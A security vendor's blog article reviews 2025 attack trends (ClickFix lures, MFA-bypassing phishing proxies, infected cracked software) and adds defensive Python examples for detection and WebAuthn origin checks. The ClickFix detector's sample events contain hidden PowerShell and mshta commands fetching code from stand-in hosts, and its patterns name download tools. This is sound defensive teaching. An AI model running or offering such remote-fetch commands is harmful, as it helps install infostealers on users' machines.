These were the most popular attacks of 2025. What should you watch out for?


18. 02. 2026

“Dis is one half.” – this message appeared on many home computer screens in the 1990s. Owning a 486 PC was not cheap for many, and this message—indicating that the computer had been taken over by a malicious virus—triggered waves of fear and panic among less technically savvy users.

The legendary OneHalf virus originated in Slovakia and became widely known worldwide under several names, most notably the “Slovak Bomber.” OneHalf secretly and quietly encrypted data on your HDD. An unsuspecting user only became aware of the intruder once the virus had encrypted half of the hard drive and boldly displayed the now-iconic message.

OneHalf is emblematic of an era in cybersecurity when viruses spread via email attachments, files, or document macros, and defense relied on antivirus software, firewalls, and basic hygiene. Updates were an ordeal in themselves, but when a system was “up to date,” it stood a good chance of managing the risk. Attacks were less widespread, and attackers were not as heavily motivated by fast financial gain as they are today.

Today, attacks have shifted from infrastructure to identity and the user. Hackers are no longer trying to bypass technical controls—they are leveraging them. They work with legitimate tools, trusted visuals, and precisely timed execution. The target is the (un)conscious decision of a person who has valid permissions, functional MFA, and access to sensitive data.

In our Security Operations Center (SOC), we observed last year that most incidents originated at the endpoint or directly from the user’s identity. “Fake system errors, man-in-the-middle techniques capable of bypassing MFA, and unauthorized software introduced directly by the user became the dominant entry points for compromise,” says Ján Andraško, CEO of Binary Confidence, evaluating the past year in cybersecurity. These three scenarios were among the most frequent and most problematic attack vectors of 2025.

1. ClickFix and the silent installation of infostealers

One of the most successful current scenarios is the so-called ClickFix. In this case, the attacker does not try to scare the user or overwhelm them with technical detail. On the contrary, they present themselves as a solution to a problem. Typically, this involves a fake notification about a system error, a security incident, or a critical application failure. This trick is often visually enhanced with the well-known Windows “blue screen of death,” which appears especially credible to less technical users.

By following the instruction offered by the “error message,” the user triggers the installation of malicious code—most commonly an infostealer. This type of malware focuses on stealing login credentials, cookies, session tokens, or stored browser passwords. The user believes they have done the right thing by fixing the issue. Detection only occurs once compromised accounts begin to be misused. Companies without an active SOC often discover the problem far too late.
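The ClickFix pattern described above leaves a characteristic trace on the endpoint: a script host spawned from a user-facing process, with a command line that reaches out to a remote host and tries to stay quiet. The following detection rule is an added example written for this article, not code from Binary Confidence or its SOC; the event schema, host names, user names and URLs are constructed assumptions.

```python
"""Heuristic detection of ClickFix-style executions (added example).

Constructed process-creation events, in a generic Sysmon/EDR-like schema,
are matched against one rule: a script host launched from a user-facing
parent (explorer.exe, as the Win+R Run dialog does) whose command line
fetches something remote and also tries to stay quiet. Field names,
hostnames and URLs are assumptions, not real telemetry.
"""
from __future__ import annotations
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    host: str
    user: str
    parent_image: str
    image: str
    command_line: str


SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}
INTERACTIVE_PARENTS = {"explorer.exe"}

# Defender-side indicators; each hit contributes a label to the finding.
INDICATORS = {
    "remote_fetch": re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|curl|wget)\b|https?://",
        re.I),
    "mshta_url": re.compile(r"mshta(\.exe)?\s+\S*https?://", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "bypass_policy": re.compile(r"-(ep|executionpolicy)\s+bypass", re.I),
}
NETWORK = {"remote_fetch", "mshta_url"}
EVASION = {"hidden_window", "encoded_command", "bypass_policy"}


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def evaluate(event: ProcessEvent) -> list[str]:
    """Return sorted indicator labels if the event matches the rule, else []."""
    if basename(event.image) not in SCRIPT_HOSTS:
        return []
    if basename(event.parent_image) not in INTERACTIVE_PARENTS:
        return []
    hits = {name for name, rx in INDICATORS.items() if rx.search(event.command_line)}
    # mshta pointed at a URL is enough on its own; otherwise require a remote
    # fetch combined with an evasion flag, so an analyst opening PowerShell
    # from the Start menu is not flagged.
    if "mshta_url" in hits or (hits & NETWORK and hits & EVASION):
        return sorted(hits)
    return []


def scan(events: list[ProcessEvent]) -> list[dict]:
    """Run the rule over a batch and return findings for the SOC queue."""
    return [{"host": e.host, "user": e.user, "image": basename(e.image),
             "indicators": evaluate(e)} for e in events if evaluate(e)]


# Constructed events: two ClickFix-shaped executions, one benign PowerShell
# launch, and one service-launched script that this rule deliberately ignores
# (service and scheduled-task launches need a separate rule).
SAMPLE_EVENTS = [
    ProcessEvent("WS-0142", "j.novak", r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell -w hidden -ep bypass -c "iwr https://updates.example.invalid/fix.txt"'),
    ProcessEvent("WS-0142", "j.novak", r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe"),
    ProcessEvent("WS-0077", "m.kral", r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\mshta.exe",
                 "mshta https://verify.example.invalid/captcha"),
    ProcessEvent("SRV-02", "SYSTEM", r"C:\Windows\System32\services.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -w hidden -c iwr https://intranet.example.invalid/inv.ps1"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The rule deliberately keys on the parent process: what makes ClickFix distinctive is that the user themselves pastes the command into a Run dialog or terminal, so the parent is explorer.exe rather than a browser, an Office process or a service. Pair it with a rule for browser-spawned script hosts, and treat a hit as a trigger to pull the user's recent sign-ins, since the infostealer's payoff is the session tokens it exfiltrates.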

A seemingly traditional “Blue Screen of Death,” in reality a ClickFix scam

2. Next-gen phishing and MFA bypass

Phishing is (almost 😊) as old as ARPANET, but its form has evolved significantly. In 2025, we are seeing the use of man-in-the-middle proxy tools such as Evilginx and similar frameworks. These can relay communication between the victim and a legitimate service in real time. Phishing-as-a-service now enables even less technically skilled actors to launch professional campaigns with fake websites that are indistinguishable from the originals for a trivial cost.

The user enters their credentials on a fake site that perfectly mimics the legitimate one. They may even successfully pass multi-factor authentication. However, the attacker captures authentication tokens in the background and gains full access to the account without needing further verification. From a defense perspective, this is one of the most dangerous trends, as it undermines the false sense of security based solely on MFA.
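The reason a relaying proxy defeats one-time codes but not phishing-resistant MFA is origin binding, which the following added example illustrates from the relying party's side. It is not code from the article's author or from any real identity provider; the RP ID, origins and proxy domain are constructed, and the cryptographic signature check over the assertion is left out so the origin and RP ID checks stand on their own.

```python
"""Why an AitM proxy cannot relay WebAuthn: origin binding (added example).

A relying party (RP) verifying a WebAuthn assertion checks, among other
things, that clientDataJSON carries the origin it expects and that the
first 32 bytes of authenticatorData equal SHA-256 of its RP ID. The browser
fills in the origin it is actually on and refuses an rpId that is not a
registrable suffix of that origin, so a look-alike proxy domain fails even
when it relays every byte. Signature verification is omitted here; the
names and hosts are constructed.
"""
from __future__ import annotations
import base64
import hashlib
import json
import secrets

RP_ID = "login.example.com"                     # constructed RP
ALLOWED_ORIGINS = {"https://login.example.com"}


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def browser_get_assertion(page_origin: str, challenge: bytes, rp_id: str) -> dict:
    """Model the client side: the browser, not the page, writes the origin."""
    host = page_origin.split("://", 1)[1].split("/")[0].split(":")[0]
    if not (host == rp_id or host.endswith("." + rp_id)):
        raise PermissionError("SecurityError: rpId is not a registrable suffix of the origin")
    client_data = {"type": "webauthn.get", "challenge": b64url(challenge), "origin": page_origin}
    flags = bytes([0x05])                        # user present + user verified
    auth_data = hashlib.sha256(rp_id.encode()).digest() + flags + (0).to_bytes(4, "big")
    return {"clientDataJSON": b64url(json.dumps(client_data).encode()),
            "authenticatorData": b64url(auth_data)}


def rp_verify(assertion: dict, expected_challenge: bytes) -> tuple[bool, str]:
    """Relying-party checks in the order WebAuthn lists them."""
    client = json.loads(b64url_decode(assertion["clientDataJSON"]))
    if client.get("type") != "webauthn.get":
        return False, "wrong ceremony type"
    if b64url_decode(client.get("challenge", "")) != expected_challenge:
        return False, "challenge mismatch (stale or replayed assertion)"
    if client.get("origin") not in ALLOWED_ORIGINS:
        return False, f"origin {client.get('origin')!r} not allowed"
    auth_data = b64url_decode(assertion["authenticatorData"])
    if auth_data[:32] != hashlib.sha256(RP_ID.encode()).digest():
        return False, "rpIdHash mismatch"
    if not auth_data[32] & 0x01:
        return False, "user presence flag not set"
    return True, "ok"


def run_scenarios() -> dict[str, tuple[bool, str]]:
    """Genuine login, two proxy variants, and a replay of an old assertion."""
    proxy = "https://login-example-com.verify.invalid"   # constructed look-alike
    results = {}
    ch = secrets.token_bytes(32)
    results["genuine"] = rp_verify(browser_get_assertion("https://login.example.com", ch, RP_ID), ch)
    try:   # proxy page asks the browser to use the real RP ID
        browser_get_assertion(proxy, ch, RP_ID)
        results["proxy_real_rpid"] = (True, "browser allowed it")
    except PermissionError as e:
        results["proxy_real_rpid"] = (False, str(e))
    # proxy page uses its own RP ID; the bytes relay fine, the origin does not
    results["proxy_own_rpid"] = rp_verify(browser_get_assertion(proxy, ch, "verify.invalid"), ch)
    old = browser_get_assertion("https://login.example.com", ch, RP_ID)
    results["replay"] = rp_verify(old, secrets.token_bytes(32))
    return results


if __name__ == "__main__":
    for name, (ok, why) in run_scenarios().items():
        print(f"{name:16} {'PASS' if ok else 'FAIL'}  {why}")
```

In practice the second proxy variant fails even earlier: a credential registered for login.example.com is not even offered to a page whose RP ID is verify.invalid. The contrast with a TOTP code or push approval is the point: those carry no statement about where the user typed them, so a proxy can forward them unchanged, while a WebAuthn assertion is signed over the origin the browser observed.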

3. Unauthorized and infected software as an entry point

The third recurring scenario was the installation of unauthorized software. Most commonly, this included cracked versions of commercial tools, graphic editors such as Adobe Photoshop, as well as game modifications, cheats, or add-ons for popular games like Roblox. The common denominator is bypassing licensing restrictions and security controls.

Such software is an ideal carrier for malicious code. Users expect antivirus or other security solutions to raise alerts, so they consciously ignore warnings or disable them altogether. For attackers, this becomes an open gateway into the system—and often into the corporate network. In SOC practice, we often encounter cases where compromise originated on a device that formally met security policies but was in reality running unauthorized and infected software.

Extra workload or a necessary gold standard?

For CISOs and IT teams, it is crucial to accept that most modern incidents do not arise from technology failure, but from human (unintentional) error—while the technology functions exactly as designed. Defense must therefore be built around identity, behavior, and context, not just the perimeter.

Ján Andraško, CEO of Binary Confidence, emphasizes that “consistent application of zero trust principles, continuous verification of identity, device, and access context is fundamental. MFA should not be seen as a final solution, but as one of several layers.” The recommended standard is phishing-resistant MFA combined with conditional access based on geolocation, device posture, and user behavior.

A key pillar is endpoint protection that goes beyond the traditional EDR model. In an environment where users can independently execute infostealers or introduce unauthorized software, it is critical to combine EDR with application whitelisting, script execution control, and “deny by default” policies. From an SOC perspective, the ability to quickly correlate endpoint signals with identity activity is essential—for example, detecting an unusual login shortly after a suspicious process execution.
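The endpoint-to-identity correlation described in the paragraph above, an unusual sign-in shortly after a suspicious process execution, can be expressed as a small joining rule. The code below is an added example, not Binary Confidence's SOC logic; the two event streams, the per-user baseline, the 60-minute window and all field names are constructed assumptions.

```python
"""Correlating endpoint and identity signals (added example).

Two constructed event streams: alerts from an EDR-like source and sign-in
events from an identity provider. The rule: a sign-in for the same user from
a country or device absent from that user's baseline, within WINDOW after a
suspicious process alert on a host they use, escalates to a correlated
incident. Field names, users, hosts and the baseline are assumptions.
"""
from __future__ import annotations
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

WINDOW = timedelta(minutes=60)


@dataclass(frozen=True)
class EndpointAlert:
    ts: datetime
    host: str
    user: str
    rule: str


@dataclass(frozen=True)
class SignIn:
    ts: datetime
    user: str
    country: str
    device_id: str | None       # None = unmanaged or unknown device
    ip: str


@dataclass(frozen=True)
class Incident:
    user: str
    host: str
    endpoint_rule: str
    signin_ts: datetime
    reasons: tuple[str, ...]


def T(s: str) -> datetime:
    return datetime.fromisoformat(s).replace(tzinfo=timezone.utc)


# Per-user baseline learned from the previous 30 days (constructed).
BASELINE = {
    "j.novak": {"countries": {"SK"}, "devices": {"WS-0142"}},
    "m.kral": {"countries": {"SK", "CZ"}, "devices": {"WS-0077", "LT-0310"}},
}


def signin_anomalies(s: SignIn) -> tuple[str, ...]:
    """Return the ways this sign-in departs from the user's baseline."""
    base = BASELINE.get(s.user, {"countries": set(), "devices": set()})
    reasons = []
    if s.country not in base["countries"]:
        reasons.append(f"new country {s.country}")
    if s.device_id is None:
        reasons.append("unmanaged device")
    elif s.device_id not in base["devices"]:
        reasons.append(f"new device {s.device_id}")
    return tuple(reasons)


def correlate(alerts: list[EndpointAlert], signins: list[SignIn]) -> list[Incident]:
    """Join anomalous sign-ins to endpoint alerts for the same user within WINDOW."""
    incidents = []
    for a in alerts:
        for s in signins:
            if s.user != a.user or not (a.ts <= s.ts <= a.ts + WINDOW):
                continue
            reasons = signin_anomalies(s)
            if reasons:
                incidents.append(Incident(a.user, a.host, a.rule, s.ts, reasons))
    return incidents


# Constructed sample data (rule names and IPs are illustrative).
SAMPLE_ALERTS = [
    EndpointAlert(T("2025-11-03T09:12:00"), "WS-0142", "j.novak", "clickfix_run_dialog_powershell"),
    EndpointAlert(T("2025-11-03T14:40:00"), "WS-0077", "m.kral", "unauthorized_software_cracked_installer"),
]
SAMPLE_SIGNINS = [
    SignIn(T("2025-11-03T08:50:00"), "j.novak", "SK", "WS-0142", "198.51.100.10"),  # normal, before alert
    SignIn(T("2025-11-03T09:31:00"), "j.novak", "NL", None, "203.0.113.45"),        # stolen session in use
    SignIn(T("2025-11-03T14:55:00"), "m.kral", "CZ", "LT-0310", "198.51.100.22"),   # in window, but baseline
    SignIn(T("2025-11-03T17:10:00"), "m.kral", "DE", None, "203.0.113.90"),         # anomalous, outside window
]

if __name__ == "__main__":
    for inc in correlate(SAMPLE_ALERTS, SAMPLE_SIGNINS):
        print(inc)
```

The window is deliberately short because an infostealer's session tokens are typically used within minutes of theft; the fourth sign-in is anomalous on its own and should still be caught by a standalone identity rule, but it is the temporal join with the endpoint alert that turns two medium-severity signals into one high-confidence incident and tells the responder which host to isolate and which sessions to revoke.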

Luma Stealer – attack description

Do not underestimate privilege management

Unauthorized software is primarily seen as a licensing and compliance issue. What is often overlooked is that it can also represent a fully-fledged attack vector. The solution lies in centralized approval processes, clearly defined exceptions, and technical enforcement of policies. The principle of least privilege should not apply only to administrative accounts. No employee should be able to install software without the knowledge of the IT department.

From a security management perspective, regularly testing reality is also critical. Simulated phishing campaigns, tabletop exercises, and purple team activities help reveal where theoretical policies diverge from actual user behavior and SOC response capabilities. For CISOs, this is also a powerful tool for communicating risk to executive leadership.

The golden standard for 2026 is therefore layered defense, combining technology, processes, and people. Organizations that can integrate identity, endpoint, and SOC into a single decision-making framework have a significantly higher chance not only of detecting an attack, but of stopping it before it escalates into a crisis with real business impact.


The project funded through grant agreement number 101145856 is supported by the European Cybersecurity Competence Centre.
